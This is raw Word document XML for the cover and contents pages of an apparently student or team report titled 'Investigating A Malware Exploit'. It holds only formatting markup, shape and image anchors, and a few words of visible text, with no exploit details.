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40A478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9C08D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk178552703"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:val="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>272415</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>63500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5486400" cy="693420"/>
                <wp:effectExtent l="0" t="0" r="19050" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Rectangle: Rounded Corners 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5486400" cy="693420"/>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76CBDE">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="52"/>
                                <w:szCs w:val="200"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="52"/>
                                <w:szCs w:val="200"/>
                              </w:rPr>
                              <w:t>Investigating A Malware Exploit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 o:spid="_x0000_s1026" o:spt="2" style="position:absolute;left:0pt;margin-left:21.45pt;margin-top:5pt;height:54.6pt;width:432pt;mso-position-horizontal-relative:margin;z-index:251670528;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#0E2841 [3215]" filled="t" stroked="t" coordsize="21600,21600" arcsize="0.166666666666667" o:gfxdata="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NIbCPPWAAAACQEA&#10;AA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kCqxMM9jgIA&#10;ADkFAAAOAAAAAAAAAAEAIAAAACUBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAlBgAA&#10;AAA=&#10;">
                <v:fill on="t" focussize="0,0"/>
                <v:stroke weight="1pt" color="#0C445E [3204]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6276CBDE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="52"/>
                          <w:szCs w:val="200"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="52"/>
                          <w:szCs w:val="200"/>
                        </w:rPr>
                        <w:t>Investigating A Malware Exploit</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686E9F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E95699A"/>
    <w:p w14:paraId="6B5D4487">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D06CF"/>
    <w:p w14:paraId="01FBFD82">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>685800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4785360" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="15240" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="2380"/>
                <wp:lineTo x="0" y="10617"/>
                <wp:lineTo x="5331" y="11532"/>
                <wp:lineTo x="5331" y="17573"/>
                <wp:lineTo x="5761" y="20319"/>
                <wp:lineTo x="5761" y="20685"/>
                <wp:lineTo x="16252" y="20685"/>
                <wp:lineTo x="16424" y="13546"/>
                <wp:lineTo x="14360" y="12997"/>
                <wp:lineTo x="7911" y="11532"/>
                <wp:lineTo x="21583" y="10617"/>
                <wp:lineTo x="21583" y="3478"/>
                <wp:lineTo x="13414" y="2380"/>
                <wp:lineTo x="0" y="238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14:paraId="0AA6210D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF15AA3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6632CC81">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3010A2B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580C6156">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B763629">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>714375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>15875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4701540" cy="1440180"/>
            <wp:effectExtent l="0" t="0" r="41910" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="4286"/>
                <wp:lineTo x="0" y="14857"/>
                <wp:lineTo x="263" y="16571"/>
                <wp:lineTo x="438" y="17143"/>
                <wp:lineTo x="21618" y="17143"/>
                <wp:lineTo x="21705" y="6571"/>
                <wp:lineTo x="21180" y="6286"/>
                <wp:lineTo x="13391" y="4286"/>
                <wp:lineTo x="0" y="4286"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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14:paraId="32FBA3D6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11549EE6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54126C75">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29AE52F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655233C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA18852">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C33C505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C421C6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A548785">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                                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04045731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4BFD7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD9E25F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="74"/>
          <w:szCs w:val="420"/>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14:ligatures w14:val="none"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1729740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>721995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2426970" cy="1056005"/>
                <wp:effectExtent l="0" t="0" r="11430" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Frame 27"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2427061" cy="1055914"/>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6.2pt;margin-top:56.85pt;height:83.15pt;width:191.1pt;mso-position-horizontal-relative:margin;z-index:251676672;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#156082 [3204]" filled="t" stroked="t" coordsize="2427061,1055914" o:gfxdata="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sZRDj1wAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMv&#10;ZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAjhLT6nYCAAAYBQAADgAAAAAAAAABACAAAAAmAQAA&#10;ZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAADgYAAAAA&#10;" path="m0,0l2427061,0,2427061,1055914,0,1055914xm131989,131989l131989,923924,2295071,923924,2295071,131989xe">
                <v:path o:connectlocs="1213530,0;0,527957;1213530,1055914;2427061,527957" o:connectangles="247,164,82,0"/>
                <v:fill on="t" focussize="0,0"/>
                <v:stroke weight="1pt" color="#0C445E [3204]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A14E22">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="78"/>
          <w:szCs w:val="460"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="78"/>
          <w:szCs w:val="460"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106CE98C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478C74C7">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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-467360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2906395" cy="3167380"/>
            <wp:effectExtent l="0" t="0" r="0" b="13970"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="11893" y="390"/>
                <wp:lineTo x="10618" y="779"/>
                <wp:lineTo x="7928" y="2209"/>
                <wp:lineTo x="7220" y="4547"/>
                <wp:lineTo x="7220" y="6885"/>
                <wp:lineTo x="6229" y="7405"/>
                <wp:lineTo x="4672" y="8704"/>
                <wp:lineTo x="3964" y="10913"/>
                <wp:lineTo x="3964" y="11172"/>
                <wp:lineTo x="4530" y="13121"/>
                <wp:lineTo x="4530" y="13381"/>
                <wp:lineTo x="6371" y="15200"/>
                <wp:lineTo x="7220" y="17278"/>
                <wp:lineTo x="7787" y="19357"/>
                <wp:lineTo x="7787" y="19617"/>
                <wp:lineTo x="10194" y="21435"/>
                <wp:lineTo x="11043" y="21565"/>
                <wp:lineTo x="13733" y="21565"/>
                <wp:lineTo x="14724" y="21435"/>
                <wp:lineTo x="16989" y="19617"/>
                <wp:lineTo x="16989" y="19357"/>
                <wp:lineTo x="17697" y="17278"/>
                <wp:lineTo x="17272" y="15070"/>
                <wp:lineTo x="15857" y="13641"/>
                <wp:lineTo x="15149" y="13121"/>
                <wp:lineTo x="15290" y="12082"/>
                <wp:lineTo x="11326" y="11172"/>
                <wp:lineTo x="12034" y="11043"/>
                <wp:lineTo x="15574" y="10263"/>
                <wp:lineTo x="15574" y="8964"/>
                <wp:lineTo x="17272" y="6885"/>
                <wp:lineTo x="17556" y="4807"/>
                <wp:lineTo x="16848" y="2209"/>
                <wp:lineTo x="14016" y="779"/>
                <wp:lineTo x="12742" y="390"/>
                <wp:lineTo x="11893" y="390"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4386580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>343535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2840990" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="0" b="22860"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="11732" y="398"/>
                <wp:lineTo x="10573" y="796"/>
                <wp:lineTo x="7821" y="2256"/>
                <wp:lineTo x="7387" y="3980"/>
                <wp:lineTo x="6952" y="7032"/>
                <wp:lineTo x="5938" y="7695"/>
                <wp:lineTo x="4635" y="8889"/>
                <wp:lineTo x="4055" y="11278"/>
                <wp:lineTo x="4780" y="13400"/>
                <wp:lineTo x="4780" y="13799"/>
                <wp:lineTo x="7097" y="15523"/>
                <wp:lineTo x="7676" y="15523"/>
                <wp:lineTo x="7242" y="17646"/>
                <wp:lineTo x="8111" y="20167"/>
                <wp:lineTo x="10428" y="21627"/>
                <wp:lineTo x="11008" y="21627"/>
                <wp:lineTo x="13759" y="21627"/>
                <wp:lineTo x="14339" y="21627"/>
                <wp:lineTo x="16656" y="20167"/>
                <wp:lineTo x="17525" y="17646"/>
                <wp:lineTo x="17380" y="15523"/>
                <wp:lineTo x="16222" y="14064"/>
                <wp:lineTo x="15498" y="13400"/>
                <wp:lineTo x="15642" y="12472"/>
                <wp:lineTo x="10428" y="11278"/>
                <wp:lineTo x="11732" y="11278"/>
                <wp:lineTo x="15353" y="10482"/>
                <wp:lineTo x="15353" y="9155"/>
                <wp:lineTo x="17236" y="7165"/>
                <wp:lineTo x="17670" y="4909"/>
                <wp:lineTo x="16946" y="2786"/>
                <wp:lineTo x="17091" y="2256"/>
                <wp:lineTo x="14194" y="796"/>
                <wp:lineTo x="13035" y="398"/>
                <wp:lineTo x="11732" y="398"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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3A309816">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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4462780" cy="3080385"/>
            <wp:effectExtent l="0" t="0" r="0" b="24765"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="11433" y="401"/>
                <wp:lineTo x="10696" y="801"/>
                <wp:lineTo x="8944" y="2271"/>
                <wp:lineTo x="8667" y="4007"/>
                <wp:lineTo x="8298" y="7080"/>
                <wp:lineTo x="7653" y="7748"/>
                <wp:lineTo x="6823" y="8950"/>
                <wp:lineTo x="6454" y="11354"/>
                <wp:lineTo x="6915" y="13492"/>
                <wp:lineTo x="6915" y="13892"/>
                <wp:lineTo x="8390" y="15629"/>
                <wp:lineTo x="8759" y="15629"/>
                <wp:lineTo x="8575" y="17766"/>
                <wp:lineTo x="9128" y="19904"/>
                <wp:lineTo x="9128" y="20304"/>
                <wp:lineTo x="10603" y="21640"/>
                <wp:lineTo x="10972" y="21640"/>
                <wp:lineTo x="12724" y="21640"/>
                <wp:lineTo x="13001" y="21640"/>
                <wp:lineTo x="14476" y="20171"/>
                <wp:lineTo x="14476" y="19904"/>
                <wp:lineTo x="15029" y="17900"/>
                <wp:lineTo x="14937" y="15629"/>
                <wp:lineTo x="14476" y="14694"/>
                <wp:lineTo x="13830" y="13492"/>
                <wp:lineTo x="11433" y="11354"/>
                <wp:lineTo x="13646" y="9217"/>
                <wp:lineTo x="14845" y="7213"/>
                <wp:lineTo x="15121" y="4942"/>
                <wp:lineTo x="14660" y="2805"/>
                <wp:lineTo x="14752" y="2271"/>
                <wp:lineTo x="12908" y="801"/>
                <wp:lineTo x="12171" y="401"/>
                <wp:lineTo x="11433" y="401"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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p>
    <w:p w14:paraId="5255AE44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478762B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0892631F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54086D72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA34626">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
